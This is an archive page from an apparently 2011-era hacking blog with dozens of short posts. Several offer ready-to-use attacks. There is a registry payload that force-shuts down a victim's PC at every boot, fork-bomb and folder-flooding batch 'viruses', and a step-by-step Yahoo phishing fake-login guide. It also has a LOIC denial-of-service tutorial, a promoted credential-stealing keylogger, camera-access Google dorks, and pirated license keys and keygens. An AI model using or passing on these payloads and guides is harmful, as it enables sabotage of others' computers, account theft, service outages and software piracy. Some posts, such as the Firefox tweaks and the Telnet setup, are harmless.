Posts

Showing posts from February, 2011

How To Hack Zynga Poker (Trick)

Image
This method works with IE and Firefox. Important: I'm doing it with IE but you can follow the same steps to do it with Firefox! Here we go: 1) Open IE and go to this link : Code: Toolbar Zynga Install Poker 2) It's an official Zynga Game Bar. Download it and install it. (It's adware and spyware FREE!) 3) Once you are done installing you'll see this bar: 4) Now click on the 'facebook icon' on the toolbar and you'll get this: 5) Login using your account. 6) Once you login the toolbar kind of refreshed in 5-10 seconds and you see a green 'play now' button. 7) Click that. It'll take you to the Zynga App. You'll now get $25k, click on the green 'Accept $25k' button : 9) Now close IE (just from the close button) 10) Open IE again. Now click the 'facebook icon' again and it'll again ask you for a login. 11) Now enter a different account and repeat steps 4-8. 12) You'll get 25k AGAIN! 13) You c

How To Hack Websites With Hexjector v1.0.7.3 Special Edition

Hexjector is an Opensource,Multi-Platform PHP script to automate site Pentest for SQL Injection Vulnerabilties Features: 1.Check for SQL Injection Vulnerablities. 2.Pentest SQL Injection Vulnerablities. 3.Detect WAF on the site. 4.Scan For Admin Page 5.Manual Dump Function 6.Browser 7.SQL Injection Type Detection Download: Sql Injection Tool Hexjector

Hack Facebook/Twitter Or Any Email Account With Session Hijacking

Image
When logging into a website you usually start by submitting your username and password. The server then checks to see if an account matching this information exists and if so, replies back to you with a "cookie" which is used by your browser for all subsequent requests. It's extremely common for websites to protect your password by encrypting the initial login, but surprisingly uncommon for websites to encrypt everything else. This leaves the cookie (and the user) vulnerable. HTTP session hijacking (sometimes called "sidejacking") is when an attacker gets a hold of a user's cookie, allowing them to do anything the user can do on a particular website. On an open wireless network, cookies are basically shouted through the air, making these attacks extremely easy. This is a widely known problem that has been talked about to death, yet very popular websites continue to fail at protecting their users. The only effective fix for this

Downloading from ShitCash - without filling any thing!

Image
THIS IS NOT A BYPASS, BUT DOES THE JOB JUST LIKE ONE This has a pretty good succeeding rate. REQUIREMENTS: - FireFox - GreaseMonkey - This script: http://adf.ly/ST2X <--- THIS DOES NOT REDIRECT TO SHITCASH OR ANY OTHER DOWNLOADING SITE! So it works pretty easy, actually. 1. You just open your ShitCash page. 2. Choose an offer. 3. Press Ctrl + Shift + F and its all filled in with random stuff. *IN SOME CASES TURN OF GREASEMONKEY BY CLICKING THE LITTLE MONKEY, IF SUBMITTED TURN ON AGAIN* 4. Now, submit the form, and your download unlocks most of the time. Optional 5. If doesn't, clean your cookies, I recommend using this add-on: http://adf.ly/ST2d and start at step 1. Need a link to test it on? Use this one: http://adf.ly/ST2w

WEP Password Cracker: Wireless Network Hacking | Download Wi-fEye

Image
  The Hacking Center WEP Password Cracker: Wireless Network Hacking | Download Wi-fEye Wi-fEye   is designed to help with network penetration testing,   Wi-fEye   will allow you to perform a number of powerful attacks Automatically, all you have to do is to lunch Wi-fEye, choose which attack to perform, select your target and let Wi-fEye do the magic !!. Wi-fEye is divided to four main menus:  Cracking menu: This menu will allow you to: Enable monitor mode View avalale Wireless Networks Launch Airodump-ng on a specific AP WEP cracking: this will allow you to perform the following attacks automatically: - Interactive packet replay. - Fake Authentication Attack. - Korek Chopchop Attack. - Fragmentation Attack. - Hirte Attack (cfrag attack). - Wesside-ng. WPA Cracking: This contains the following attacks: - Wordlist Attack - Rouge AP Attack. 2. Mapping: this menu will allow you to do the following: Scan the network and view the connected

How To Browse Forums Without Logging

Image
Visit any forum or website to find something useful and they will ask you to register. All websites and forums will block unregistered users, but they won’t block Google Bot. What we will do is to switch our User Agent to that of Google Bot and freely browse any website or forum without registering.   First grab the User Agent Switcher add-on for Firefox called ‘user agent’ here and install it. Now go to Tools > User Agent Switcher > Options and then again to Options. Select User Agent from the left sidebar and click Add. Now in the description field type: crawl-66-249-66-1.googlebot.com and in user agent field type: Googlebot/2.1 (+ Google Bot ) as shown in the screenshot below. Select Google Bot as your User Script by going to Tools > User Agent Switcher. Now browse any website or forum without registering.

Tuneup Utilities 2011 keygen 100% working Tested

Image
Tuneup Utilities 2010 keygen 100% working Tested   scanned by Kaspersky   Download From Here

USB flash drive portable browsers

Image
Have you ever been some place other than your home on your computer? If your answer is anything other then yes, you need to stop being a computer hugging hippy and go outside, get a whif of some fresh air, step on some dog crap and accidently run over a cat. It’ll do you some good. Anyways, have you visited someone somewhere and while using his/her/its computer, you realized you didn’t know a password because it was saved on your browser, or you wanted to show your friend that one cool website with the non-Asian ninjas, but it was in your bookmarks, or you wanted to use an extension you had installed on your browser that got rid of homosexual ads? Well you can. It’s called portable browsers, a.k.a a browser on your USB drive. If you use Mozilla Firefox, which I highly recommend, you can download the portable browser hiya: I’m a link. If you’re an apple fanboy or just like safari, you can download it’s portable version hiya: I’m a link too. If you use Inter

shutdown your friend's computer everytime it start:

Thats really easy. put this followin text in a .reg file and run it in the victims pc: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\W indows\CurrentVersion\Run] "VIRUS"="%windir%\\SYSTEM32\\SHUTDOWN.EXE -t 1 -c \"Howz this new Virus ah\" -f" DONT PUT IT IN UR COMPUTER, I AM NOT RESPONSIBLE, if it happens, to you, start windows in safe mode, and open registry editor by typiing REGEDIT in start->run. navigate to [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]and remove the string value named VIRUS, restart you computer. You can also put this in a javascript code, just add this code to your webpage: Be careful, a drawback of the js code is that NORTON ANTIVIRUS's script blocking feature may block this.  well i am also trying to find the method which executes without any drawbacks. So if u have one, pls post it here. ENJOY !!!

Remote TCP Session Reset Utility

This security tool can remotely display all active sessions on a terminal server, router, dial-in server, access server, etc. The user can reset any TCP session remotely. Resetting a connection is simple. Start up the remote TCP session reset Enter the IP address of the machine whose connection is to be reset. Enter the read-write community string. Click on connect to retrieve a list of active TCP connections Click on the connection that is to be disconnected, and select 'Break' from the toolbar.

Hack a website with denial of service attack

Now i will show you how to hack a website with Denial of service attack. For this tutorial we will be using one of the most effective and one of the least known tools called "Low Orbit Ion Cannon", created by Anonymous members from 4chan.org, this program is one of the best for DDoS'ing, and I have successfully used it to DDoS websites. An internet connection as bad as mine (2,500 kb/s) was able to keep a site down for a day with this program running. Remember that this tool will work best with high internet speeds , and try not to go for impossible targets (like Google, Myspace,Yahoo). LOIC is used on a single computer, but with friends it's enough to give sites a great deal of downtime. Prerequisites: Download LOIC (Low Orbit Ion Cannon) . Open up LOIC. Step 1: Type the target URL in the URL box. Step 2: Click lock on. Step 3: Change the threads to 9001 for maximum efficiency. Step 4: Click the big button " IMMA FIRIN MAH LAZ

HTTPort - Bypass an HTTP proxy

SEE FOR HTT HOST HTTPort allows you to bypass an HTTP proxy, which is blocking you from the Internet. With HTTPort you may use the following software (just a sample list, not limited to !) from behind an HTTP proxy: e-mail, IRC, ICQ, news, FTP, AIM, any SOCKS capable software, etc. etc. The basic idea is that you set up your Internet software in such a manner, that it considers your local PC to be a remote server it needs. This is where HTTPort enters. It intercepts connection from this software and runs the connection through the proxy - this is called a tunneling. Your software should use TCP/IP. HTTPort does not work with UDP/IP. There are two ways you can set up your software for use with HTTPort:    1.       If your software uses a single (small range of) fixed server with a single (small range of) fixed port: For instance your software would like to connect to some.server.com:some_port. Create a new HTTPort mapping, with any local port, preferably above 1024,

Tool: eMailTrackerPro

Image
eMailTrackerPro analyzes the e-mail header and provides the IP Address of the machine that sent the e-mail. This can then be used to track down the sender. This is especially helpful in preventing spamming and spoofing. An email spoofer may just be trying to cause trouble or discredit the person being spoofed by sending some truly vile message to the recipient. The built-in location database tracks e-mails to a country or region of the world. eMailTrackerPro also provides hyperlink integration with VisualRoute. Example: Received: from BBB (dns-name [ip-address]) by AAA ... For tracking purposes, we are most interested in the from and by tokens in the Received header field. Where: name is the name the computer has named itself. dns-name is the reverse dns lookup on the ip-address. ip-address is the ip-address of the computer used to connect to the mail server that generated this Received header line. The ip-address is important for tracking purposes. Always ba

Hack yahoo accounts using fake login page

In this post I’ll show you to hack yahoo using fake login page to hack yahoo in simple steps.A Fake Login Page is a page that exactly resembles the original login page of sites like Yahoo,Gmail etc.However, these Fake login pages are created just for the purpose of stealing other’s passwords. Here in this post I will give a procedure to create a fake login page of Yahoo.com.The same procedure may be followed to create the fake login page of Gmail and other sites. Here is a step-by-step procedure to create a fake login page and hack yahoo. Hack yahoo using fake login page - Procedure STEP 1. Go to the Yahoo login page by typing the following URL. mail.yahoo.com STEP 2. Once the Yahoo login page is loaded, Save the page as Complete HTML file . (Not as .mht file) To save the page goto File->Save As Tip: .mht option is available only in IE 7. So if you you are using some other browser you need not worry. STEP 3. Once you save the

How To Hack Facebook/Myspace/Orkut Or Any Email

Image
How To Hack Facebook/Myspace/Orkut Or Any Email By Keylogging Fud Long Time Rapzo Logger v 1.5 ( Public Edition )By Rapid " Virus Results By Scan4you.net 0/32 " (Paid Host ) Options Stealers [6] All Stealers Pure Code - No Drops + Runtime FUD [#] Firefox 3.5.0-3.6.X [#] DynDns [#] FileZilla [#] Pidgin [#] Imvu [#] No-Ip Features [25] * Full UAC Bypass & Faster Execution * Coded in Vb.NET * Min Req Is .net 2.0 Now A days every pc Have it * Cool & user friendly GUI * Easily Understandble * Encrypt Information * Encrypt E-mail information * 100% FUD from all AV's * 4 Extentions [ . exe | .scr | .pif | .com ] * Keylogger support - Smtp[Gmail,Hotmail,live,aol,] * Test E-mail - is it vaild or not. * Customize the "To" e-mail address. * Screen Logger * Cure.exe to remove server from your Compute * Usb Spreade * File pumper - Built-in * Icon Changer - Preview * Logs are nice and clear * Log Letters - ABCD e

Free Full Version Software to Recover Deleted Files

Image
Free Full Version Software to recover deleted files. Using this software you not only can recover deleted files but also formatted drives can be easily recovered. So Enjoy.. Hetman Uneraser recovers deleted files and folders in a few easy steps! The file recovery software is simple to use yet yields impressive results in recovering most of the lost data from all kinds of media. Supporting hard disks, USB drives, memory cards, and many other types of storage media, Hetman Uneraser can recover data from all types of FAT and NTFS disks. The file recovery software makes it easy to get back deleted files and folders as well as data lost after virus attacks, system failures, hard disk damage and memory card corruption. Using the data recovery program could not be easier. Just select the disk that used to contain your files, and Hetman Uneraser will perform the complete scan automatically. You can select, filter, sort, and preview the files it discover

How To Download And Install Linux

Image
Thanks Folks For your positive response to  A beginners guide to Linux   Now in this article i will show you how to download and install linux in vmware work station. Tools required Bittorrent  or any torrent client / Download Bittorrent Here Vmware Workstation  or Virtual Box or  Virtual PC   / Download vmware workstation 7.1.3 Here If you already have vmware workstation 7.1.3 without lisence then make it a full version. Vmware workstation 7.1.3 Keys FC78U-DQZEP-M8EXZ-U6P7X-QAAY8 UA5MK-FAZ8H-08EMZ-PFWGT-W2UG6 CV5WA-4VD03-M8EKP-2WW5C-NPUG2 ZA3EK-DVG84-M851Z-RWM5E-PUK90 FG7RR-8GD4H-M84LZ-DPY5Z-MKR9A CC1N2-42D93-484AZ-8ZMXX-WG2WA CentOS 5.5 Linux / Download Centos 5.5 From here Don,t worry about torrent speed these torrents are good. After downloading all above mention essential things you are ready to install linux. 1 : How To install vmware 7.1.3 in windows video tutorial for newbies After installing Vmware workstation you are ready to install cen

Recover windows xp after virus attack

Image
Hello guys , as we all know nowadays virus attacks are very common and we have to have lot of problems because of viruses like task manager does not opens,folder options missing, registry has been disabled by administrator,cannot find dll and so on. These are very common problems and can happen with any of us so we must know to fix these problems without formatting your windows XP. Most of the virus infects your basic programs i.e task manager,registry,group policy editor,boot up,folder properties etc. Today i will tell how to Fix windows Xp after virus attack in this article. So guys read on...            There are several free tool in the market that can help you to fix your windows xp after virus attacks but i always come with complete package. Don't worry friends its also a free tool but using this you can recover almost every windows services and functionality within few seconds and that's also without formatting. Why i am telling all this

How To Speed Up Firefox (How To)

Here's something for broadband people that will really speed Firefox up: 1.Type "about:config" into the address bar and hit return. Scroll down and look for the following entries: network.http.pipelining network.http.proxy.pipelining network.http.pipelining.maxrequests Normally the browser will make one request to a web page at a time. When you enable pipelining it will make several at once, which really speeds up page loading. 2. Alter the entries as follows: Set "network.http.pipelining" to "true" Set "network.http.proxy.pipelining" to "true" Set "network.http.pipelining.maxrequests" to some number like 30. This means it will make 30 requests at once. 3. Lastly right-click anywhere and select New-> Integer. Name it "nglayout.initialpaint.delay" and set its value to "0". This value is the amount of time the browser waits before it acts on information it recieves. If you're using a broadba

What is Proxy?

Proxy is a network computer that can serve as an intermediate for connection with other computers. They are usually used for the following purposes: As firewall, a proxy protects the local network from outside access.     *       As IP-addresses multiplexer, a proxy allows to connect a number of computers to Internet when having only one IP-address     *       Proxy servers can be used (to some extent) to anonymous web surfing.     *       Specialized proxy servers can filter out unwanted content, such as ads or 'unsuitable' material.     *       Proxy servers can afford some protection against hacking attacks.       The program Win gate is often used as proxy. Quite a number of such proxies are open to easy access. Anonymous proxies hide the real IP address (and sometimes other information) from websites that the user visits. There are two sorts; ones can be used in the same way as the non-anonymous proxies above, and web-based anonymizers.       Usin

Enable Telnet in windows 7

It’s very rare that I use Telnet these days, so it took a long time for me to notice that by default it was not packaged with Windows 7. I did some research and found out that this was also true for Windows Vista. More than likely this was an attempt to make Windows more secure by default, as Telnet is very insecure and whenever you have the choice you should always use SSH. However, with that being said, you can quickly re-enable Telnet by following these steps: Start Control Panel Programs And Features Turn Windows features on or off Check Telnet Client Hit OK After that you can start Telnet via Command Prompt. Credits FettesPS

Top Ten Online Antivirus Scanner For You To Use

Image
While browsing the internet, the constant fear that itches at the back of our mind is whether our machine is getting affected by any virus/worms or not. To stop this unwanted intrusion by any malware, all of us rely on our machine installed anti-virus software . But unfortunately, some of this antivirus software might hamper your computer’s performance and even allow any malware to attack your machine if not updated regularly. To make sure your computer’s safety has not been compromised, you can always scan your machine by any online antivirus scanner. Infact, An online virus scanner can be good option if you are doubtful about your installed antivirus. Possibilities of missing some threats are always there by standalone antivirus software and somehow enough to make you jump on second opinion. But one must be careful while choosing any of such online anti-virus scanner as they can themselves turn out to be some kind of malware. To help you out in your search

How To Hide Your IP Adress

Image
Are you aware that many websites and most hackers use IP addresses to monitor your personal business , your home address and other personal information about you can be retrieved once your IP address is known?The softwares is 100% free of spyware and adware . This is proven by many 3rd parties.There are several ways to hide your ip, here is a list of sites where you can try it out: 1.hideyouripaddress.net You can either download the program(the trial version),or pay for it. If you choose to download the trial version,you are allowed to use it for 3 days… Downlaod Link If you choose to pay for it, you can choose if you want to pay 1,2, or 3 years. Link 2. hide-my-ip.com You can here also choose from the trial version and payment.The trial version allows you to use the program 14 days. Download Link If you choose to pay for it go here: link you will get something like this Click the product which name has ,,Hide my ip” 3.easy-hide-ip.com Trial version last for

How to use Google for Hacking

Google serves almost 80 percent of all search queries on the Internet, proving itself as the most popular search engine. However Google makes it possible to reach not only the publicly available information resources, but also gives access to some of the most confidential information that should never have been revealed. In this post I will show how to use Google for exploiting security vulnerabilities within websites. The following are some of the hacks that can be accomplished using Google. 1. Hacking Security Cameras There exists many security cameras used for monitoring places like parking lots, college campus, road traffic etc. which can be hacked using Google so that you can view the images captured by those cameras in real time. All you have to do is use the following search query in Google. Type in Google search box exactly as follows and hit enter inurl:”viewerframe?mode=motion” Click on any of the search results (Top 5 recommended) and you will gain access to t

How To Make A Virus [From Hack Pc]

Image
This is step by step tutorial that explains how to make a virus. Here you’ll teach how to make simplest virus called fork bomb and how to make a virus that will make an unlimmited amount of folders in any place you want. 1)How To Make The Simplest Virus – Fork Bomb Launching fork bomb will lead to total CPU jam by opening about 500 process of command prompt . CPU usage will be overloaded and computer will freeze. 1) Launch notepad and type %0|%0 2) Save as .bat , for example fork.bat 3) Launch .bat file that you created in step 2 , once a successful fork bomb has activated in a system, one may have to reboot to resume normal operation. 2) How To make A virus That Will Make 1,000 Folders In Few Seconds Here I will teach you simple virus that will make an unlimmited amount of folders in any place you want. Step 1 Open notepad and type : @echo off :top md %random% goto top @echo off makes it so that it appears to be a blank screen but actually its makin
Image
If you are looking for free softwares to extract rar files without password then here are two simple tools to open locked rar file archives. Simply download them you might jut be able to extract files from password protected Rar files. Extract Files from Password Protected RAR Files Winrar Unlock Unlock locked winrar archive (including SFX) allowing you to modify the content freely. With Winrar archive lock to prevent modification, people cannot change the content/comment in it. Through some patching of few bytes, you are able to modify your archive with ease. Download Winrar Unlock: Link RAR Password Cracker This program is intended to recover lost passwords for RAR/WinRAR archives of versions 2.xx and 3.xx. The program finds by the method of exhaustive search all possible combinations of characters (“bruteforce” method), or using passwords from lists (“wordlist” or “dictionary” method). Self-extracting archives and multivolume archives are supported. Download RAR P